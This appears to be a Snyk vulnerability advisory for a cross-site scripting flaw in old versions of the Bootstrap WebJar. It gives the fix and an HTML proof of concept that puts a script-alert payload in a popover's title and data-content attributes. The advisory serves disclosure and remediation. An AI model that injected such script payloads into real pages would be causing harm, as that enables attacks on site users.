Cross-site Scripting (XSS) Affecting org.webjars:bootstrap package, versions (,2.1.0)
Threat Intelligence
Exploit Maturity
Proof of concept
- Snyk ID SNYK-JAVA-ORGWEBJARS-479511
- published 10 Apr 2017
- disclosed 9 May 2012
- credit Peter Corsaro
How to fix?
Upgrade org.webjars:bootstrap to version 2.1.0 or higher.
Overview
org.webjars:bootstrap is a WebJar for Bootstrap.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS). The value used for the html option of popovers/tooltips is read with jQuery's .attr() method and inserted unescaped, which may allow attackers to exploit this vulnerability by injecting script through the title or data-content attributes.
PoC

```html
<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Bootstrap Example</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link
      href="https://stackpath.bootstrapcdn.com/twitter-bootstrap/2.0.4/css/bootstrap-combined.min.css"
      rel="stylesheet"
      integrity="sha384-G87n9a15LEsz+OvKCr10ldEbckfbCpr2gjYnZgCiKiwH0p/If1QkSURCTzubbt19"
      crossorigin="anonymous"
    />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
    <script
      src="https://stackpath.bootstrapcdn.com/twitter-bootstrap/2.0.4/js/bootstrap.min.js"
      integrity="sha384-2sVosMIQw67h8RBCTmE20BSl9j66nWwbH+2W/CKr8celILSNnEfJnJv2PKCdet3I"
      crossorigin="anonymous"
    ></script>
  </head>
  <body>
    <div class="container">
      <h3>Popover Example</h3>
      <a
        href="#"
        data-toggle="popover"
        title="<script>alert('XSS')</script>"
        data-content="<script>alert('XSS')</script>"
      >Toggle popover</a>
    </div>
    <script>
      $(document).ready(function() {
        $('[data-toggle="popover"]').popover();
      });
    </script>
  </body>
</html>
```
Details
References
CVSS Scores
version 3.1